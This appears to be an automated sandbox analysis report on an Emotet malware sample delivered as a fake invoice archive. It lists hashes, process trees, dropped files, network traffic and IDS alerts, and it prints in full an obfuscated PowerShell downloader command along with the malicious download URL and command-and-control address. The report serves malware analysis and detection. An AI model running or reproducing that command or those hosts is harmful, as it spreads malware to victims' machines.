File name: | Factura _ HAS834685.7z |
Full analysis: | https://app.any.run/tasks/a8127302-7d15-4e91-b478-d17fc479a57e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 21, 2019, 20:49:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-7z-compressed |
File info: | 7-zip archive data, version 0.4 |
MD5: | E6C16FC121EE1CA12C7ABE3983552020 |
SHA1: | 3D7A73416BE409F02A84FEDAA127D1EEB0B2111E |
SHA256: | D4A0BCBF2508F697BD1568F22A12B4F8CC8BC1871ACBB7414FFC9922D0642A5A |
SSDEEP: | 1536:RT0SR+oaBRySe4S8ZVCEzXq6dw3ZTzElswg1DKgBUX++SdBcLCq:V/RpaBRiEV4j32Vg1mOUX+xsmq |
.7z | | | 7-Zip compressed archive (v0.4) (57.1) |
---|---|---|
.7z | | | 7-Zip compressed archive (gen) (42.8) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
688 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Factura _ HAS834685.7z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
888 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb688.42243\Factura _ HAS834685.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2440 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Facture_Num_HAS834685.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4060 | powershell -e IAAoAG4ARQBXAC0ATwBiAEoAZQBjAFQAIAAgAEkAbwAuAEMAbwBNAFAAcgBlAFMAUwBJAG8ATgAuAEQAZQBmAGwAQQB0AEUAUwBUAFIARQBBAG0AKAAgAFsAcwB5AHMAVABlAE0ALgBpAE8ALgBNAEUATQBPAFIAeQBTAHQAUgBlAGEATQBdACAAWwBTAFkAcwBUAGUAbQAuAGMAbwBuAFYAZQBSAFQAXQA6ADoARgByAG8ATQBCAGEAcwBlADYANABTAFQAUgBJAG4ARwAoACgAJwBYAGQAQgAnACsAJwBiACcAKwAnAGEAOQBzAHcARgBBAEQAZwB2ACcAKwAnADYAJwArACcASQBIAGcAeABLAHkAVwBIAFUAeABoACcAKwAnAGQAVQAnACsAJwBZAGUAaABJAHoATAA5AEMAJwArACcATgAnACsAJwBtAHUAJwArACcARQAnACsAJwAxAG0ARQBHACcAKwAnAFEAJwArACcAbAAnACsAJwBlAE4ATAAnACsAJwA1AFUAJwArACcAagBHAFYAcQBvADAAJwArACcASQAnACsAJwBmACcAKwAnADkAOQBXAHQAWQBMAG0AOQAnACsAJwA2AE8AKwBNADcAVgAnACsAJwBFADcAQwAnACsAJwB3ACcAKwAnAE4AbwBPAFkAdABpAEYAcwAnACsAJwBiAEEAJwArACcAbwAnACsAJwBMACcAKwAnAEcAbgBrACcAKwAnAFcAZwBvAFcAQQBBAG0ASwBGAGQAcQA3AEwASgB4AFMARwAnACsAJwBmAEUAZgBqACcAKwAnAFAAMgAnACsAJwBLADUANwBGAHAAVQBKAHYASwBPAHkAMAB5ACcAKwAnAEsAeABLACcAKwAnAFUAMQB4AHYAUwAnACsAJwAzAGoAJwArACcARgBsACcAKwAnAHIAZgBWAEgAJwArACcAdQBlAEkAMQBLAHYAJwArACcAUABoACcAKwAnAEMANwA1ACcAKwAnAGoAdAA1ADAASQByADQAJwArACcAegAnACsAJwBSAEwAKwAzAFgAJwArACcANQBjACcAKwAnADgALwB1ACcAKwAnAC8AdAAnACsAJwBqAHgARgAnACsAJwBUACcAKwAnAGYAeQA2ACcAKwAnAHYAcgBtAEEAcQArAFAAJwArACcANAA5AE8AdQBsACcAKwAnAE0AeABXACcAKwAnADEAZgAnACsAJwBJAC8AJwArACcAdwA5AFcAMgAzAEwAZQBkADQAWAAnACsAJwAwAC8AJwArACcAWAB1ACcAKwAnAHcAZwAnACsAJwBxAHIAJwArACcASgBsAFgANwAnACsAJwArAEYAJwArACcAMwAnACsAJwBWAC8AJwArACcAcABZAE0AZQAnACsAJwBIAGQAaAAnACsAJwB4ADUAJwArACcAMwAnACsAJwAvAEIAJwArACcAaAB4AHkAJwArACcAKwBvADAAcQBWACcAKwAnAGkAJwArACcAOQAnACsAJwAyACcAKwAnAEQAJwArACcARgAnACsAJwB1ACcAKwAnADYAbABSAEQAegAnACsAJwBYACcAKwAnAEsAZABzACcAKwAnAFQAJwArACcAaAAnACsAJwBJACcAKwAnAGcAeQBPAGgAJwArACcAbQBWAG0AJwArACcAegBhACcAKwAnAGoAJwArACcALwAnACsAJwBvACsAOQBhAE0ANgBGADMAZAAnACsAJwBCACcAKwAnAHAANQBBACcAKwAnAEIAdAAnACsAJwBZAEwAJwArACcAeQBHAEkANgBUAEUAQgBBAE8AdABPAGMAUgAnACsAJwA4ACcAKwAnAFUARQBCAFEAawBKAHYAJwArACcAUgB6AGUATwBQAGkAJwArACcAcgBjADYATABKAEgAUgA3ACcAKwAnAEEANgBSAEoAJwArACcAbAB1ACcAKwAnAFgAdQBxACcAKwAnADAAOABGACcAKwAnAEIAJwArACcATwBzAHMAOQBsAEEAOQAnACsAJwAzACsANQBkACcAKwAnAGkAMwA3ACcAKwAnAFEAVgBkACcAKwAnAHYAaAAnACsAJwBqACcAKwAnAFAANgBpAHMAOQBjAEMAJwArACcATQArAHIAagBBACcAKwAnAFcAbAAnACsAJwBVADYAUQBHADUAYQAnACsAJwBDACcAKwAnAGEAZQBnAGwAeABxACcAKwAnAEMAVABsAHAAJwArACcARgBYAGsAJwArACcANwA1AHYAJwArACcAUgAnACsAJwBrACcAKwAnAGgAcABmACcAKwAnAFQAKwAnACsAJwAvACcAKwAnAFgAOQBSAEYAdgAnACsAJwBWAGEAYgA3ADkANABvAHAAOQAnACsAJwBaAEgAJwArACcAdwBpAGIAeAAzAGQAeABEAHcASgBvAEEAaABqAFcAbwAnACsAJwBnACcAKwAnAEEAJwArACcARABuAGwAYQAnACsAJwAwAEcAJwArACcAaABWAGsAYwAnACsAJwBrAGsAJwArACcAUgBUAE4AZgBHACcAKwAnAGQAeAA5ACcAKwAnAFUATAA5AEQAVgBaACcAKwAnAHUAJwArACcARwAnACsAJwB6AEcAJwArACcAcwBrACcAKwAnADQAWgBWADcAJwArACcAVQAzAEoAYQAnACsAJwBxAFcAYwB0ADgAVgA4ACcAKwAnAFkAZQBRACsANQBEAEUAJwArACcAQwAnACsAJwA0AEIAVQBOAFkAeQBBADIATgBTAGoAJwArACcAZQB4ACcAKwAnAGoAJwArACcATQA1AG4AdwBZADEAJwArACcAbwBUACcAKwAnAHUAZQB6ADkAJwArACcANQBoAEIAJwArACcAbgBzAGkAJwArACcAWQBwAHAARABEAEEAUQBTAE4AZgBnAE0APQAnACkAIAApACwAIABbAHMAWQBTAFQARQBNAC4AaQBPAC4AQwBvAE0AcABSAEUAcwBzAEkAbwBuAC4AYwBPAG0AcABSAGUAUwBzAEkATwBOAE0AbwBkAEUAXQA6ADoARABlAEMAbwBNAHAAcgBlAHMAUwApACAAfAAgAEYAbwByAEUAQQBjAGgALQBvAEIAagBlAEMAVAB7ACAAbgBFAFcALQBPAGIASgBlAGMAVAAgAGkAbwAuAHMAdABSAGUAQQBNAHIARQBhAGQARQByACgAJABfACAALABbAHQARQB4AFQALgBlAG4AQwBvAEQAaQBuAEcAXQA6ADoAYQBTAEMAaQBpACkAfQApAC4AcgBlAEEAZAB0AE8AZQBuAEQAKAApACAAfAAgACYAIAAoACAAJABTAGgAZQBMAEwASQBkAFsAMQBdACsAJABzAGgARQBsAGwASQBkAFsAMQAzAF0AKwAnAHgAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
304 | "C:\Users\admin\946.exe" | C:\Users\admin\946.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
2524 | --21281139 | C:\Users\admin\946.exe | 946.exe | |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
2556 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 946.exe | |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
3152 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Version: 8,6,0,1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR39FD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L18Y2XZAYA1875WJAIG8.temp | — | |
MD5:— | SHA256:— | |||
2440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2528D0B4F435A69E0B33284300361C1A | SHA256:1F15076BA8E04BF318B428E992F9F2B609465E382B6F85831574B2801C050B72 | |||
688 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb688.42243\Factura _ HAS834685.zip | compressed | |
MD5:9BD31B86E55F83FC1C085289164F8788 | SHA256:0A2C18CD03E99010DCAF952EE5D38C94EC2D1F85D41F07E0505214549CC6EAD6 | |||
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Facture_Num_HAS834685.doc.LNK | lnk | |
MD5:6E94608624B24F3CC8BC343BE3400CC0 | SHA256:542737B6B26C61EC3AB78F5B451C4875981F679A1E9EC89830F2CB7C897EA479 | |||
2440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:6C2E05CA89DC6F78E7D7A7BE2D231876 | SHA256:FCE207C49BFAEBA635D616E1713F9A82B97C7B320892AFD7733B65ADA2D420F4 | |||
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF104b14.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2440 | WINWORD.EXE | C:\Users\admin\Desktop\~$cture_Num_HAS834685.doc | pgc | |
MD5:997B8D59A298D963D9BECF3352BB1861 | SHA256:6E7C2F2AB8452123ED817FE424DC129079DDE4827B59BF9F8F826024A17AB049 | |||
2524 | 946.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:03072AD10291D3EE749CE3717511B35E | SHA256:D8851D8EE62CE7646344D49AC54F4C7008C27795177DD05E0534F809EF9FC8B8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4060 | powershell.exe | GET | 200 | 192.99.175.156:80 | http://www.cbmagency.com/wp-content/GpXbVu/ | CA | executable | 352 Kb | suspicious |
3152 | wabmetagen.exe | POST | 200 | 189.250.145.98:443 | http://189.250.145.98:443/nsip/attrib/ringin/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3152 | wabmetagen.exe | 189.250.145.98:443 | — | Uninet S.A. de C.V. | MX | malicious |
4060 | powershell.exe | 192.99.175.156:80 | www.cbmagency.com | OVH SAS | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
www.cbmagency.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
4060 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4060 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4060 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3152 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |